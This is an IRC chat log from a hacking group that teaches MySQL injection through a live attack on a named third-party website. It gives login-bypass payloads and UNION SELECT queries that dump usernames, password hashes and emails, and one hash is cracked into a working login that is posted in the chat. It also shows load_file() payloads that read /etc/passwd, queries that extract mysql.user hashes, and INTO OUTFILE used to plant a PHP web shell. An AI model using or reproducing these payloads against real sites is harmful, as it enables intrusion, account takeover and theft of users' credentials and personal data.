GoNullYourself.org
----------------------------------------------------------------------------
[2:02pm] pSyChOmOnkee: SQL Injection
[2:02pm] pSyChOmOnkee: let's define it first
[2:02pm] pSyChOmOnkee: from a newb perspective
[2:02pm] sToRm: say a site has the script:
[2:03pm] sToRm: mysql_query('SELECT * FROM table WHERE id = '.$_GET['id']);
[2:03pm] pSyChOmOnkee: and it runs with php and mysql for databases
[2:03pm] pSyChOmOnkee: some sites
[2:03pm] pSyChOmOnkee: can use other sql systems
[2:03pm] pSyChOmOnkee: such as mssql
[2:03pm] pSyChOmOnkee: and protege sql or whatever that one is called
[2:04pm] sToRm: we can insert ("inject") code into the GET variable "id"
[2:06pm] sToRm: and essentially take over the query into mysql
[2:06pm] sToRm: different DB software will require different injections
[2:06pm] sToRm: we will explain MySQL injection
[2:06pm] sToRm: ok
[2:06pm] sToRm: so
[2:06pm] sToRm: let's talk about how to find a vuln site
[2:06pm] sToRm: the most common method is mysql_query('query..') or die(mysql_error());
[2:06pm] sToRm: so
[2:06pm] sToRm: if there is an error in the MySQL query,
[2:08pm] sToRm: the most common error detection that people use is mysql_query('query..') or die(mysql_error());
[2:08pm] sToRm: so if the query is messed up
[2:08pm] sToRm: it will give us an ugly mysql error message
[2:08pm] pSyChOmOnkee: the error gives out information
[2:08pm] sToRm: the most important information being that it's vuln
[2:09pm] sToRm: a good way of testing if a site is vuln is by adding an apostrophe to the query
[2:09pm] sToRm: i.e.:
[2:09pm] sToRm: site.com/index.php?id='
[2:09pm] sToRm: it may spit out something like
[2:09pm] sToRm: Query fatal error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''8' at line 1
[2:09pm] sToRm: or a mysql_fetch error
[2:10pm] sToRm: every site is different
[2:10pm] sToRm: so
[2:10pm] sToRm: once we found a site
[2:10pm] sToRm: that is vuln
[2:10pm] sToRm: we need to inject it
[2:10pm] sToRm: and take over the MySQL query
[2:10pm] pSyChOmOnkee: to prove the concept
[2:11pm] pSyChOmOnkee: the injection will add additional commands to the mysql query
[2:11pm] pSyChOmOnkee: such as /index.php?id=1 and 1=0--
[2:12pm] pSyChOmOnkee: -- being one way to comment (commenting any additional code)
[2:12pm] pSyChOmOnkee: /* is another type of commenting
[2:13pm] sToRm: by inserting this string, the MySQL query becomes: SELECT * FROM table WHERE id = 1 and 1=0
[2:13pm] sToRm: which will error, because although
[2:13pm] sToRm: there may be a row where id = 1
[2:14pm] sToRm: but 1 doesn't equal 0
[2:14pm] sToRm: therefore returning no results
[2:14pm] sToRm: and like pSyChO said, -- or /* is a MySQL comment
[2:14pm] sToRm: so
[2:14pm] sToRm: say the query was
[2:15pm] sToRm: SELECT * FROM users WHERE username = '.$_GET['username'].' AND password = '.$_GET['password']
[2:15pm] sToRm: assuming we're using php here
[2:15pm] sToRm: we'd have the script collect variables through:
[2:15pm] sToRm: login.php?username=name&password=pass
[2:15pm] sToRm: we could inject it by:
[2:16pm] sToRm: login.php?username=Admin--&password=whatever
[2:16pm] sToRm: the -- would comment out the rest of the statement
[2:16pm] sToRm: the part where it checks the password
[2:16pm] sToRm: SELECT * FROM users WHERE username = Admin-- AND password = '.$_GET['password']
[2:16pm] sToRm: so in actuality, it's really
[2:16pm] sToRm: SELECT * FROM users WHERE username = Admin
[2:16pm] sToRm: boom
[2:16pm] sToRm: the query finds the row Admin
[2:16pm] sToRm: and you're logged in
[2:17pm] sToRm: but
[2:17pm] sToRm: MySQL injection is mostly used for getting information from tables
[2:17pm] sToRm: not necessarily bypassing logins
[2:17pm] sToRm: the information we usually gather is logins, though
[2:17pm] sToRm: so
[2:17pm] sToRm: say you found a vuln site
[2:18pm] sToRm: index.php?id='
[2:18pm] sToRm: gives an error
[2:18pm] sToRm: we would start the injection by:
[2:18pm] sToRm: index.php?id=null+ORDER+BY+1--
[2:18pm] sToRm: we would then check if there is no error returned
[2:18pm] sToRm: if there is no error, then we are good
[2:19pm] pSyChOmOnkee: k
[2:19pm] pSyChOmOnkee: I hope everyone understands things thus far
[2:19pm] sToRm: any questions so far?
[2:19pm] pSyChOmOnkee: or comments?
[2:19pm] dioms: nop
[2:20pm] pSyChOmOnkee: PM me if you have any questions
[2:20pm] pSyChOmOnkee: and I will answer them
[2:20pm] pSyChOmOnkee: but for now I'll continue
[2:20pm] pSyChOmOnkee: as sToRm said
[2:21pm] pSyChOmOnkee: sql injections can be used for getting information from tables
[2:21pm] pSyChOmOnkee: or bypassing logins
[2:21pm] pSyChOmOnkee: to quickly cover the login bypassing
[2:22pm] pSyChOmOnkee: http://www.gonullyourself.org/main/index.php
[2:22pm] pSyChOmOnkee: sign out if you are signed in
[2:22pm] pSyChOmOnkee: and you can see the username and password fields
[2:22pm] pSyChOmOnkee: this won't work on GNY, but here is an example of a simple sql injection login bypass
[2:22pm] pSyChOmOnkee: username: ' OR 'a'
[2:22pm] pSyChOmOnkee: password: ' OR 'a'
[2:23pm] pSyChOmOnkee: this makes it SELECT user FROM table_users WHERE username = ' OR 'a' AND password = ' OR 'a'
[2:24pm] pSyChOmOnkee: instead of username = username and password = password
[2:24pm] pSyChOmOnkee: which would work
[2:24pm] pSyChOmOnkee: but the point is to bypass it
[2:24pm] pSyChOmOnkee: there are different simple login injections to try on a site
[2:24pm] pSyChOmOnkee: but that explains the concept for all of them
[2:25pm] pSyChOmOnkee: okay
[2:25pm] pSyChOmOnkee: now on to getting information from tables
[2:25pm] pSyChOmOnkee: this is the good part of sql injection where you could possibly extract an admin username and password hash
[2:25pm] pSyChOmOnkee: to begin I like to try and map out what the database contains
[2:26pm] pSyChOmOnkee: every database has columns and rows
[2:26pm] pSyChOmOnkee: to see how large the database is
[2:27pm] pSyChOmOnkee: you can inject index.php?id=
[2:27pm] pSyChOmOnkee: starting with id=1
[2:27pm] pSyChOmOnkee: all the way until you get an error saying there is no such user to match that id
[2:27pm] pSyChOmOnkee: so if it gives an error on id=35
[2:27pm] pSyChOmOnkee: then we know there are 34 users
[2:28pm] pSyChOmOnkee: to help us do this we can download a firefox addon
[2:28pm] pSyChOmOnkee: called HackBar
[2:28pm] pSyChOmOnkee: it allows you to select a piece of a url and increment it by 1 if it is an integer
[2:29pm] pSyChOmOnkee: and this will automate the process of exploring the size of the database
[2:29pm] sToRm: ok
[2:29pm] sToRm: quick questions
[2:29pm] pSyChOmOnkee: anything?
[2:29pm] oXiKoTToN: http://www.gonullyourself.org/main/admin <- lmfao
[2:30pm] oXiKoTToN: all i gotta say
[2:30pm] pSyChOmOnkee: lolk
[2:31pm] pSyChOmOnkee: again, PM if anything comes up that you want to clarify
[2:36pm] sToRm: ok
[2:37pm] sToRm: so
[2:37pm] sToRm: we've been over vuln statements
[2:37pm] sToRm: now
[2:37pm] sToRm: we'll learn how to inject them
[2:37pm] sToRm: and pull data from tables
[2:37pm] sToRm: first
[2:37pm] sToRm: index.php?vuln=null+ORDER+BY+1--
[2:37pm] sToRm: if that produces no error
[2:37pm] sToRm: we're good
[2:37pm] sToRm: so
[2:37pm] sToRm: let's increment 1
[2:37pm] sToRm: by 1
[2:37pm] sToRm: until it gives us an error
[2:38pm] sToRm: so
[2:38pm] sToRm: index.php?vuln=null+ORDER+BY+2--
[2:38pm] sToRm: index.php?vuln=null+ORDER+BY+3--
[2:38pm] sToRm: index.php?vuln=null+ORDER+BY+4--
[2:38pm] sToRm: etc.
[2:38pm] sToRm: until it errors
[2:38pm] sToRm: when it does
[2:38pm] sToRm: say at
[2:38pm] sToRm: index.php?vuln=null+ORDER+BY+13--
[2:38pm] sToRm: that means there are 12 columns
[2:38pm] sToRm: in the current table
[2:38pm] sToRm: so
[2:38pm] sToRm: now that we know how many columns are in the table
[2:38pm] sToRm: let's find what data from the table is echoed to the script
[2:39pm] sToRm: we will do this with a UNION command
[2:39pm] sToRm: UNION will effectively add a second query to the first
[2:39pm] sToRm: and it will execute it
[2:39pm] sToRm: index.php?vuln=null+UNION+ALL+SELECT
[2:39pm] sToRm: now
[2:39pm] sToRm: because there are 13 columns
[2:39pm] sToRm: we would do:
[2:39pm] sToRm: index.php?vuln=null+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--
[2:40pm] sToRm: if there is still no error, we're doing great
[2:40pm] sToRm: now
[2:40pm] sToRm: hopefully
[2:40pm] sToRm: there will be some numbers randomly on the page
[2:40pm] sToRm: between 1 and 13
[2:40pm] sToRm: these are the vuln columns
[2:40pm] sToRm: so
[2:40pm] sToRm: say there was a 3, 7, and 10 on the page
[2:40pm] sToRm: we can inject columns 3, 7, and 10
[2:40pm] sToRm: so
[2:40pm] sToRm: here's an example
[2:41pm] sToRm: we are going to hack http://www.freepremiumaccounts.com
[2:41pm] sToRm: this is an odd example, though
[2:41pm] sToRm: but the concept is still there
[2:41pm] sToRm: remember, every site is different
[2:41pm] sToRm: so
[2:41pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=
[2:41pm] sToRm: the GET variable "go" is vuln
[2:42pm] sToRm: if we do ORDER BY, we find there is only one column
[2:42pm] sToRm: so our injection will become:
[2:42pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+1--
[2:42pm] sToRm: it will redirect to http://www.freepremiumaccounts.com/1
[2:42pm] sToRm: because the site is weird
[2:42pm] sToRm: but as you can see, 1 is vuln
[2:42pm] sToRm: how to inject this vuln?
[2:43pm] sToRm: let's start with MySQL variables
[2:43pm] sToRm: there are a set of variables that are pre-defined in MySQL
[2:43pm] sToRm: a few are @@version, user()
[2:43pm] sToRm: there are more
[2:43pm] sToRm: @@version tells us the MySQL version
[2:43pm] sToRm: user() tells us the username to the mysql login
[2:44pm] sToRm: so
[2:44pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+@@version--
[2:44pm] sToRm: will give us
[2:44pm] sToRm: http://www.freepremiumaccounts.com/4.1.22-standard
[2:44pm] sToRm: user()
[2:44pm] sToRm: http://www.freepremiumaccounts.com/free_free@localhost
[2:44pm] sToRm: so
[2:44pm] sToRm: now to pull data
[2:45pm] sToRm: in order to construct a query that will pull data from a table, we need to figure out two things
[2:45pm] sToRm: the name of the table
[2:45pm] sToRm: and the name(s) of the columns we want
[2:45pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+1+FROM+users--
[2:45pm] sToRm: users is the table name
[2:45pm] sToRm: a very informational table at that
[2:46pm] sToRm: learning table names is a guess-and-check process
[2:46pm] sToRm: common ones are: users, user, members, member, admins, etc.
[2:46pm] sToRm: so
[2:46pm] sToRm: once we find a table
[2:46pm] sToRm: we are going to try to find column names
[2:47pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+username+FROM+users--
[2:47pm] sToRm: will pull the column username
[2:47pm] sToRm: but
[2:47pm] sToRm: we don't want just the column username
[2:47pm] sToRm: we also want the column password
[2:47pm] sToRm: so
[2:47pm] sToRm: we use a command called concat
[2:48pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+concat(username,password)+FROM+users--
[2:48pm] sToRm: as you can see
[2:48pm] sToRm: we get
[2:48pm] sToRm: admin234330ee08c99eadaa632221f5252587957
[2:48pm] sToRm: admin is our username
[2:48pm] sToRm: 330ee08c99eadaa632221f5252587957 is the hash
[2:48pm] sToRm: md5
[2:48pm] sToRm: !bot @decrypt 330ee08c99eadaa632221f5252587957
[2:49pm] [HaShBoT]: |.: MD5 :.| No match for 330ee08c99eadaa632221f5252587957
[2:49pm] pSyChOmOnkee: kfine
[2:49pm] sToRm: well
[2:49pm] sToRm: try to crack it
[2:49pm] sToRm: lo
[2:49pm] sToRm: so
[2:49pm] sToRm: now we can pull data from the columns username and password
[2:49pm] sToRm: now let's control which user to pull
[2:49pm] sToRm: we will do this with the WHERE clause
[2:50pm] pSyChOmOnkee: this acts similar to an if-then statement
[2:50pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+concat(username,password)+FROM+users+WHERE+id=1--
[2:50pm] sToRm: admin234 is at id=1
[2:50pm] sToRm: if we tweak it to, say
[2:50pm] sToRm: id = 2
[2:50pm] sToRm: we will get the second member
[2:50pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+concat(username,password)+FROM+users+WHERE+id=2--
[2:50pm] sToRm: Jensab823e401a3228803898cd9af9ebae8cd
[2:50pm] pSyChOmOnkee: and don't forget to check id=0
[2:50pm] sToRm: ^^
[2:51pm] pSyChOmOnkee: although it is nobody
[2:51pm] pSyChOmOnkee: on this site
[2:51pm] pSyChOmOnkee: it may be an admin on another site
[2:51pm] sToRm: so
[2:51pm] sToRm: now we are able to pull data from tables
[2:51pm] sToRm: and control which row we pull
[2:51pm] sToRm: we can enumerate the site
[2:51pm] sToRm: and pull any user we wish to
[2:51pm] sToRm: crack their hash
[2:51pm] sToRm: login
[2:51pm] pSyChOmOnkee: !bot @decrypt b823e401a3228803898cd9af9ebae8cd
[2:51pm] sToRm: get their email
[2:51pm] sToRm: etc.
[2:51pm] [HaShBoT]: |.: MD5 :.| b823e401a3228803898cd9af9ebae8cd = luder123
[2:52pm] pSyChOmOnkee: username: Jensa
[2:52pm] pSyChOmOnkee: k
[2:52pm] sToRm: we just got an account
[2:52pm] sToRm: this is the beauty of SQL injection
[2:52pm] . pSyChOmOnkee high fives hashbot
[2:52pm] sToRm made this room no longer moderated for normal users.
[2:52pm] sToRm: questions?
[2:52pm] pSyChOmOnkee: http://www.freepremiumaccounts.com/admin234330ee08c99eadaa632221f5252587957freepremiumaccounts@gmail.com
[2:52pm] pSyChOmOnkee: emails too
[2:53pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+concat(username,password,email)+FROM+users+WHERE+id=1--
[2:53pm] sToRm: etc
[2:53pm] pSyChOmOnkee: and you can try other random table names
[2:53pm] pSyChOmOnkee: for more information
[2:53pm] h4ck3d joined the chat room.
[2:53pm] sToRm: the userbase is usually the most sought-after table, though
[2:53pm] NullBoT set a limit on the number of room members to 23.
[2:54pm] sToRm: so
[2:54pm] pSyChOmOnkee: unless you want to see who has enough referrals to redeem an account
[2:54pm] sToRm:
[2:54pm] sToRm: lol
[2:54pm] pSyChOmOnkee: or if we look hard enough
[2:54pm] pSyChOmOnkee: they may be storing rapidshare accounts in mysql
[2:54pm] pSyChOmOnkee: doubt it though
[2:55pm] pSyChOmOnkee: but anyway there is huge possibility amongst these types of attacks
[2:55pm] sToRm: so
[2:55pm] sToRm: now that we've successfully hacked www.freepremiumaccounts.com
[2:55pm] sToRm: and gained the ability to pull users
[2:55pm] ZiL0: CAN WE DELETE SHIT?!
[2:55pm] x2Fusion: Now get that uploading done ya hear, root that nig
[2:56pm] x2Fusion: And lmao at zil0
[2:56pm] sToRm: lol
[2:56pm] sToRm: yes
[2:56pm] ZiL0: show me..
[2:56pm] ZiL0: delete jensen
[2:56pm] sToRm: we can manipulate shit
[2:56pm] sToRm: take it away psycho
[2:56pm] pSyChOmOnkee: I was going to cover something else real quick
[2:56pm] sToRm: sure
[2:56pm] pSyChOmOnkee: another mysql function
[2:57pm] pSyChOmOnkee: load_file()
[2:57pm] pSyChOmOnkee: this will only work on some sites
[2:57pm] pSyChOmOnkee: but as with all sql injections, we may get lucky
[2:58pm] sToRm: you need mysql root privileges
[2:58pm] sToRm: go on
[2:59pm] pSyChOmOnkee: we can try to load
[2:59pm] pSyChOmOnkee: a few things from this
[2:59pm] pSyChOmOnkee: such as .htaccess
[2:59pm] pSyChOmOnkee: or on a unix box /etc/passwd
[3:00pm] pSyChOmOnkee: this can give us more information on the site, or even the server's password file
[3:00pm] pSyChOmOnkee: and on to x2's rooting
[3:00pm] pSyChOmOnkee: okay
[3:00pm] pSyChOmOnkee: so how do I use this function?
[3:01pm] x2Fusion: load_file('/etc/passwd')
[3:01pm] x2Fusion: etc, if addslashes is on then you need to hex it up
[3:01pm] x2Fusion: load_file(0x272F6574632F70617373776427)
[3:01pm] pSyChOmOnkee: yeah
[3:01pm] pSyChOmOnkee: or
[3:01pm] pSyChOmOnkee: we can use
[3:01pm] pSyChOmOnkee: char()
[3:02pm] pSyChOmOnkee: another function
[3:02pm] pSyChOmOnkee: it will change decimal ascii into string format
[3:03pm] pSyChOmOnkee: load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115))
[3:03pm] pSyChOmOnkee: I believe that will load .htaccess
[3:03pm] pSyChOmOnkee: and as you see
[3:03pm] pSyChOmOnkee: does not use slashes
[3:03pm] pSyChOmOnkee: and will still parse as a string
[3:03pm] x2Fusion: load_file(0x272F6574632F70617373776427) is for /etc/passwd btw.
[3:04pm] sToRm: ^^
[3:05pm] sToRm: just a reminder
[3:05pm] sToRm: you need mysql root privileges
[3:05pm] sToRm: so it's a matter of luck
[3:05pm] sToRm: to load files
[3:05pm] sToRm: etc.
[3:05pm] pSyChOmOnkee: and we happen to be unlucky on the free rapidshare site
[3:06pm] sToRm: you would put the load_file() in the place of the 1 or the @@version or whatever
[3:06pm] sToRm: and it would echo the results to the script
[3:06pm] DeadlyData: PEEKABOO!
[3:06pm] pSyChOmOnkee: hi Deadly
[3:06pm] sToRm: yo
[3:06pm] DeadlyData: sup kids?
[3:07pm] sToRm: sql injection lecture
[3:07pm] sToRm: at this moment
[3:07pm] sToRm: rofl
[3:07pm] DeadlyData: mm
[3:07pm] sToRm: ok
[3:07pm] . DeadlyData Sits back and enjoys the view.
[3:07pm] sToRm: last thing
[3:07pm] sToRm: we will explain
[3:07pm] sToRm: is how to gain mysql root
[3:07pm] sToRm: this will only work if the server is v5
[3:07pm] sToRm: hence why @@version is important
[3:08pm] sToRm: (most) v5 servers have a table named mysql.user
[3:08pm] sToRm: which contains hashes and usernames to mysql login
[3:08pm] pSyChOmOnkee: (note: the site we injected was v4 remember)
[3:08pm] sToRm: ^^
[3:08pm] sToRm: if you find this, you're lucky
[3:08pm] sToRm: so
[3:10pm] sToRm: basically, mysql.user is pulled by: concat(user,0x3a,password)+FROM+mysql.user--
[3:10pm] sToRm: etc.
[3:11pm] sToRm: you get mysql hashes
[3:11pm] sToRm: crack them
[3:11pm] sToRm: win
[3:11pm] sToRm: ok
[3:11pm] sToRm: explain outfile pl0x
[3:11pm] DeadlyData: sToRm, Question.
[3:11pm] sToRm: yar
[3:11pm] DeadlyData: What kind of hashes are those?
[3:11pm] DeadlyData: Might help people.
[3:11pm] sToRm: mysqlsha1
[3:11pm] sToRm: jtr won't load them
[3:11pm] sToRm: so use passwordspro
[3:11pm] pSyChOmOnkee: and they are not md5
[3:11pm] pSyChOmOnkee: like the ones from before
[3:12pm] sToRm: you can tell if it's mysqlsha1 if it has a * in front of it
[3:12pm] sToRm: and is all caps
[3:12pm] sToRm: usually
[3:12pm] sToRm: the string
[3:12pm] sToRm: mypass
[3:12pm] sToRm: is hashed to:
[3:12pm] sToRm: *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4
[3:12pm] x2Fusion: yar
[3:13pm] sToRm: so
[3:13pm] sToRm: fin mysql.user
[3:13pm] sToRm: lol
[3:13pm] pSyChOmOnkee: k outfile time
[3:14pm] pSyChOmOnkee: SELECT columns FROM table_name WHERE whatever='something' INTO OUTFILE "/tmp/outfile.txt";
[3:14pm] sToRm: or /public_html/shell.php
[3:14pm] DeadlyData: yeah
[3:14pm] DeadlyData: except it requires root/you need to have the full path
[3:15pm] x2Fusion: Yeah, mostly has to be under (system/mysql) root.
[3:15pm] pSyChOmOnkee: and the full path
[3:15pm] pSyChOmOnkee: can be obtained
[3:15pm] pSyChOmOnkee: from your original injection
[3:15pm] DeadlyData: and you basically just enter php shell code inside of a column
[3:15pm] DeadlyData: and pull it out into a php file
[3:15pm] DeadlyData: via the INTO OUTFILE command.
[3:15pm] DeadlyData: then just visit the shell and it will execute.
[3:16pm] GunniH: hey pSyChOmOnkee
[3:16pm] GunniH: hey sToRm
[3:16pm] pSyChOmOnkee: so, in the end, if you get lucky, you can root, shell and sql inject the same site all at once
[3:16pm] dioms: mmm, how do I know if I have mysql root?
[3:16pm] DeadlyData: in your sql injection
[3:16pm] DeadlyData: use the function
[3:17pm] DeadlyData: user()
[3:17pm] DeadlyData: and it will echo on to the page
[3:17pm] DeadlyData: what user you are currently under.
[3:17pm] DeadlyData: so replace one of the column counted numbers with "user()"
[3:18pm] pSyChOmOnkee: any other questions?
FIN!